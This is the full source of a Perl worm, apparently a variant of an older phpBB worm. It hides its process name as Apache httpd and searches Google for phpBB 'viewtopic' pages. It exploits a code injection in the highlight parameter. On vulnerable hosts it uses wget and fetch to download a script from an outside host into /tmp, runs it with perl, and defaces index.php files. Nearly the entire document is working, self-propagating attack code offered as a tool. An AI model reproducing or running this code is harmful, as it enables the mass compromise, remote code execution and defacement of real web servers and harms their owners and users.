# ASW worm 8nd modification - MyPrettyWorm.perl !
# Created ( riped ) by br0k3d@gmail.com
# Created ( riped-again ) by rockemon@gmail.com
# Turned back to life by sirh0t@w00pie.nl
# Fuckz google ! Fuckz MSN ! Fuckz Fotolog.net


use strict;
use IO::Socket;
use IO::Handle;

unlink $0;

#Start hiding the process
my $processo = '/usr/local/apache/bin/httpd -DSSL';
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
#Process hided

sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 50;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);

    my @str=("%22v-i-e-w-t-o-p-i-c%22");

    my $query="www.google.com/search?num=100&q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&num=$n&start=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/google|cache|translate/){
            push (@lst,$1);
        }
    }
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };
    return $page;

}

sub encode($) {
    my $s = shift;
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
    $s =~ s/%252E$//;
    return $s;
}


if (-e "sirh0t_0wnz") {exit;}
eval {fork and exit;};

$|++;
open LOG,">>sirh0t_0wnz";
autoflush LOG 1;
srand;
my $iam=$ARGV[0];
my $oneday=time+86400; # it was 1 week but google is blocking all :(
my $page="";
my @urls;
my $url;


while(time<$oneday){
@urls=fetch();
foreach $url (@urls) {
if ($url !~ /viewtopic.php/) {next;}
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
print LOG "chk ".$url." ";
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
my $upload=$url;
$upload =~ s/viewtopic.*//;
print LOG ">bug viewtopic found ";
$cmd="cd /tmp;wget dentalgazete.com/forum/credits;fetch -a dentalgazete.com/forum/credits;perl credits";    # set cmd
$cmd=encode("$cmd");    # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);

$cmd="echo phpBB worm is alive? hihi sirh0t and 00pz were here>index.php;echo phpBB worm is alive? hihi sirh0t and 00pz were here>../index.php";    # set cmd
$cmd=encode("$cmd");    # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
print LOG ">done\n";
}
else {
print LOG ">viewtopic ok\n";
}
}
}
close LOG;